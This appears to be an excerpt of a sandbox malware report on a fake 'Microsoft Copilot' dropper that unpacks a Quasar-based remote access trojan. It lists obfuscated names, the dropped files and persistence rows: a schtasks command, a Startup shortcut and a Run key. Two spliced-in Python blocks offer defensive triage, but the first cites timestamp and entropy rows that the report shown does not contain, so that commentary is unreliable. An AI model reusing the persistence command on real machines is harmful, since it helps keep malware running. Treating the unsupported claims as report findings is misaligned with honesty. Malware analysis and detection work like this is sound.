                    Source: Microsoft Copilot.exe.1.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csHigh entropy of concatenated method names: 'wd76gDubxesDbDajQMUcaXkr9pTksJZPBeuflwgSj1MDa2IQvyGjDdSv9ADZ9B6CweGvSTGSShuu5dM4QBeWG9I', 'fNgi7pPBcbsQy9237UndotP16XTPTisnfZZg8aORcJcVHgGDn3t2tW0NOXUa7UXoaHcBEpllHsp7kTiQldFbkJ7', '_7Eq7iOmpU53TTL8OHOAqqdBQz0o3ZyZ3waB5TJ00Uwgl2rc0DeB567MejLOKt9RKQOZnRy7WQ9dDLkrc7kn9Yi9', '_56N8isy8FI1GuJBl0z4C97Exkx9DmPTVhg08FgBnwD2UwJbcT7SIERrN04Ay9U8ARzDTgLxkvHNmDbQF0rCZTGM', '_5rDOO4kboCqyZPyzA2OaLmSQ3MR3CPrXR8kf87WFNwYW1IwjTSowvn26IhLEWcE9buxmmXZqQTVhySOcv1B7qr0', 'MsXc94LEFTYocjklQThny61epluqEyxDUubulPuO0jqRBLShKfjA07v3t6tOfFdmr1MyE3Dx9IhhIiJknVhUQqi', 'RXscBl8tsb4J5B3Hg3HuxHnUrbAItIsyvMVhufxjaU3xmx27h7rA5jB2azQBHcPnq6oXkQWD16BD7wLJyROp5jY', 'iegOmGxTPr28aBjTs1Bpt3gyCSgOA4ldBKs7MHbHTO59fBv6Bk2AgdwazLH2SdZfvgmu3ESMfXjVxFaaiaIP6rJ', '_9SJCwAwqP1bNJ1lxmTucjMgUJ3uVv0E3ADEgYVmlr3OYlPEH5JwxrK44d4eE3Be8DlbiVFOYB2WjaV9KRFiYlGD', '_5dLEcawLxZeFVKZjgpN3wzdhbKaPtDhQOFKyHjPR9MIFsyMgVpijXc15Wr8KIJUPqhdIITTsfWDOeicEZlxZK9o'
                    Source: Microsoft Copilot.exe.1.dr, lN9yj0DclvLFRThUfMYKKmx2hzrhxQ13n5kxy2uTP7z60LyMXNHr5aH2jqOLeRa4Pi9le3w24R6tmLaZf8rxnyC.csHigh entropy of concatenated method names: 'asG8aK4379S4LVCWeww50ZK1vccCwVCRHCQgD4Ttkcesi7hM1iBGOi0w6QJhyvNQTnOKDpqVArBx7i0J7VfZagn', 'RBotrOTrFq2SH6MOLHscsFYm1gIiFwiw49RstOzq9T2M5c8XngG9XGaDNlMOYiCh9YF8wPXEieU6ro9JXJoZGGd', 'LLvNWppYJwppCewCURVUIOv256OxJFlObOUrrbVbxQ9Jzk9Ud2Dn6sktBMc60ueRNkvbqrgZpCyznX9WES6LIDB', '_1D8H93VJcm5uLul3rV4GmDH5kBITjCt1W72fXJCWAx2mtqvEnbz2GMHGEXmUANIRcamcCVxw9bDxnN5Hn46jKWI', 'GJQCgPL0mJRNm3M', '_4MZQxFDozqVQOs0', 'dFghmN08kbr7QtI', 'wgsKqYmdAb5ZZQI', 't8GUAUDDrhNkhmv', '_2rtGFiKXxe6wvJV'
                    Source: Microsoft Copilot.exe.1.dr, 08I4HlpfZvcXgQJn6jhwLOiX5NhqxmSDMQTziisZ5tgE8NeYxznxnl0.csHigh entropy of concatenated method names: 'rkhiNPWgaENIbdkCp6mJtdOPN3mFbpQMuPwvi8kf4rGCc2X72CpsDNt', '_59bJb29T3A9eh4GP7lPhvEZDx5CXQKRkNqgJsPN3vWk8rPr3YsWN6q1FQAdkmo7JVizqwY4Bc0hhMF873KwYNxE', '_8SpLtqtxL11qXpFPX0EYNetLlM7tGh5fkVJXBWlIBPqVCCMlqqoEtdyIYiSROIRSFJUCYVze3U7GOgybQJ1GZ4B', '_3tN4sqb7XBF96eyGZbHxv1TWxurThY4vI02UIVrImdNI7ZZ3yxAw34w8MHNp44J9sS1m4qNtxWtJc6cGBgvt2ym', 'UQBh4otD5J4nlDsaVWOkC8ul68K27zQk7FVjcst0hAxOyvXHJZp1hgwAhyK8oAigDYhN5Oc9gu453aovpq1m3EQ', 'lBAkOyFN4esJnd6690p9qvYki7ULS5jkmRPFPFIvZmlkhOv8jdfX7MiLJ4mM2T8AZutZSoxVZ2GtseegPiFKjHL', 'VRPg9HqyC1arRrsr8BoK5OUv9X8pjpUTh10SPJW4GIotpLazNtgLvv04K5DmXcqBXsNNIEcxbeu9H9ZtQzd1hcm', 'ha4EUhVu1mLLH2coeWSfQZrhSfxZJDXOgv2uauPZ6fPKI8yxvygvQVk3CvudwZqQ3Wg3j4guhUTHn1zs5k0Zm9R', 'MwHHezqwVMSNQjjljHaBml7A5yY2DrmHdQCYBX3eVMwOucmz2b2z4FzLzRNtREPUp3VezMRw9HXbwmuBye73QsF', 'RWB6kPdfXI6U1deoBZhLKOdv6VCsya4A9FnQidDywAh6d3DP70QkSqvixLFsG9Yrhns4n3ni5x4aKFRew2wA1Yq'
                    Source: Microsoft Copilot.exe.1.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csHigh entropy of concatenated method names: 'bJcJPCY3g4GZB37VXKjWdykXzvKaVcspg6h2Tky5txjBt3vo0IpVM4fOzFGUuvQU0wOVdHT3roVP9VhbXJ8GP5W', 'qbixFGD30WX2pBs', 'YdqRMxdvksPO6bu', 'vafmKXXYFmdgUGo', '_32tQUhdDBDxEIwM'
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dll
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | File created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                    Source: C:\Windows\SysWOW64\7za.exe | File created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | File created: C:\Users\user\AppData\Local\Temp\Copilot.exe
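Two of the static rows in this block are cheap to reproduce on every dropped file: the TimeDateStamp of Mono.Cecil.Rocks.dll decodes to a date in 2058, and the .text section of Quasar.resources.dll has an entropy above 7.5 bits per byte. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the COFF header and section table of a PE image, decodes the link timestamp, computes per-section Shannon entropy and flags both conditions. The PE it analyses is constructed inline (the report's timestamp value with synthetic section contents), and the 7.0 bits/byte cut-off is an assumed threshold, not one the report states.

```python
import math
import struct
from datetime import datetime, timezone


def shannon_entropy(data):
    """Bits per byte: 0.0 for an empty or single-valued buffer, 8.0 when every byte value is equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(blob):
    """Read the COFF header and section table; return the link timestamp and per-section entropy."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, vsize, _, raw_size, raw_ptr, _, _, _, _, _ = struct.unpack_from("<8sIIIIIIHHI", blob, table + 40 * i)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return {"machine": machine, "timestamp": stamp,
            "compiled": datetime.fromtimestamp(stamp, tz=timezone.utc), "sections": sections}


def triage(info, now=None, entropy_threshold=7.0):
    """Assumed rules: a link time after 'now', or any section at or above the entropy threshold, is reported."""
    now = now or datetime.now(timezone.utc)
    findings = []
    if info["compiled"] > now:
        findings.append(f"TimeDateStamp {info['timestamp']:#010x} decodes to "
                        f"{info['compiled']:%Y-%m-%d %H:%M:%S} UTC, after the current time")
    for s in info["sections"]:
        if s["entropy"] >= entropy_threshold:
            findings.append(f"section {s['name']} entropy {s['entropy']:.2f} >= {entropy_threshold} "
                            "(packed or encrypted content)")
    return findings


def build_sample_pe(stamp, sections):
    """Construct a minimal, non-loadable PE: DOS stub, PE signature, COFF header, 2-byte optional header, sections."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = struct.pack("<H", 0x20B)  # PE32+ Magic only; SizeOfOptionalHeader tells the parser how far to skip
    headers_end = e_lfanew + 4 + 20 + len(opt) + 40 * len(sections)
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF  # 0x200 file alignment
    first_raw = raw_ptr
    table, data = b"", b""
    for idx, (name, content) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(content), 0x1000 * (idx + 1),
                             len(content), raw_ptr, 0, 0, 0, 0, 0x60000020)
        data += content
        raw_ptr += len(content)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), stamp, 0, 0, len(opt), 0x22)
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers + b"\0" * (first_raw - len(headers)) + data


SAMPLE_STAMP = 0xA5EFDE46                           # TimeDateStamp the report shows for Mono.Cecil.Rocks.dll
PACKED_TEXT = bytes(range(256)) * 16                # constructed: uniform byte distribution, entropy exactly 8.0
PLAIN_RDATA = (b"Quasar.Common.dll\0" * 256)[:4096]  # constructed: repetitive ASCII, low entropy


def demo():
    """Parse the constructed sample and score it against a fixed 'now' so the result is reproducible."""
    sample = build_sample_pe(SAMPLE_STAMP, [(b".text", PACKED_TEXT), (b".rdata", PLAIN_RDATA)])
    info = parse_pe(sample)
    return info, triage(info, now=datetime(2024, 10, 6, tzinfo=timezone.utc))


if __name__ == "__main__":
    info, findings = demo()
    print(info["compiled"].isoformat())
    for line in findings:
        print("-", line)
```

To run it against a real dropped file, replace build_sample_pe(...) with the bytes of the file. Treat the timestamp finding as a hint rather than proof: assemblies built with Roslyn's deterministic compilation carry a content hash in this field instead of a real date, so a lone "future" timestamp on a .NET library should be corroborated by the entropy result and the behavioural rows above.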

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Copilot
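The rows above describe one persistence bundle: a scheduled task that re-launches the dropped binary from the user's Temp folder every minute with the highest run level, a Startup-folder shortcut whose target climbs six directories up and back down into Local\Temp, and an HKCU Run value carrying the same "Microsoft Copilot" name. The Python below is an added triage example, not tooling from the report and not code from the malware: it parses the schtasks command line, resolves the relative LNK target against the Startup folder and flags any autostart whose image lives in a user-writable temp or profile directory, in the spirit of the Sigma "suspicious folder" rules the report cites. The records are constructed from the rows above; the Run value's data is an assumption, because the report shows only the value name, and the OneDrive entry is a constructed benign control.

```python
import ntpath
import re

# Startup folder of the analysed profile; the LNK target in the report is relative to the .lnk's own directory.
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# Directories a standard user can write to. Assumption: this follows the idea of the Sigma "suspicious
# folder" rules, it is not their exact pattern set.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
                   "\\programdata\\", "\\windows\\temp\\")

# Records constructed from the Boot Survival rows. The Run value's data is an assumption (the report
# lists only the value name); the OneDrive record is a constructed benign control.
OBSERVED = [
    {"kind": "schtasks",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                r'/tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"'},
    {"kind": "startup_lnk", "lnk": ntpath.join(STARTUP_DIR, "Microsoft Copilot.lnk"),
     "target": r"..\..\..\..\..\..\Local\Temp\Microsoft Copilot.exe"},
    {"kind": "run_key", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "Microsoft Copilot", "data": r"C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe"},
    {"kind": "run_key", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "OneDrive", "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_windows_cmdline(cmdline):
    """Split on whitespace while keeping double-quoted runs together (Windows quoting, no backslash escapes)."""
    return [m.group(1) if m.group(1) is not None else m.group(2) for m in _TOKEN.finditer(cmdline)]


def parse_schtasks(cmdline):
    """Map each /switch of a schtasks.exe command line to its value (lower-cased key); bare switches map to True."""
    tokens = split_windows_cmdline(cmdline)
    opts = {}
    i = 1  # tokens[0] is the schtasks.exe image itself
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i][1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def image_path_from_command(command):
    """Executable part of a Run-key or /tr command: the quoted image if quoted, else the text up to the first .exe."""
    if command.startswith('"'):
        return split_windows_cmdline(command)[0]
    m = re.match(r"(.*?\.exe)", command, re.IGNORECASE)
    return m.group(1) if m else command


def resolve_lnk_target(lnk_path, relative_target):
    """Resolve a relative LNK target against the folder holding the .lnk; ntpath applies Windows rules on any host."""
    return ntpath.normpath(ntpath.join(ntpath.dirname(lnk_path), relative_target))


def in_suspicious_dir(path):
    lowered = path.lower()
    return any(d in lowered for d in SUSPICIOUS_DIRS)


def triage_persistence(records):
    """Return the autostart records that earn at least one reason, together with the resolved image path."""
    findings = []
    for rec in records:
        reasons = []
        if rec["kind"] == "schtasks":
            opts = parse_schtasks(rec["cmdline"])
            target = image_path_from_command(str(opts.get("tr", "")))
            if str(opts.get("rl", "")).upper() == "HIGHEST":
                reasons.append("task runs with /RL HIGHEST")
            if str(opts.get("sc", "")).lower() == "minute":
                reasons.append(f"task re-launches the image every {opts.get('mo', 1)} minute(s)")
        elif rec["kind"] == "startup_lnk":
            target = resolve_lnk_target(rec["lnk"], rec["target"])
            if ".." in rec["target"].split("\\"):
                reasons.append("LNK target climbs out of the Startup folder with ..")
        elif rec["kind"] == "run_key":
            target = image_path_from_command(rec["data"])
        else:
            continue
        if in_suspicious_dir(target):
            reasons.append("image lives in a user-writable temp/profile directory")
        if reasons:
            findings.append({"kind": rec["kind"], "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_persistence(OBSERVED):
        print(f["kind"], f["target"], "; ".join(f["reasons"]), sep=" | ")
```

On a live host the same functions can be fed from the output of schtasks /query /xml, the Startup folders of every profile, and the Run and RunOnce keys under HKCU and HKLM. The 8.3 short name user~1 in the task action expands correctly only on the host itself, which is why the check matches on the AppData\Local\Temp substring rather than on a fully resolved path.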

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
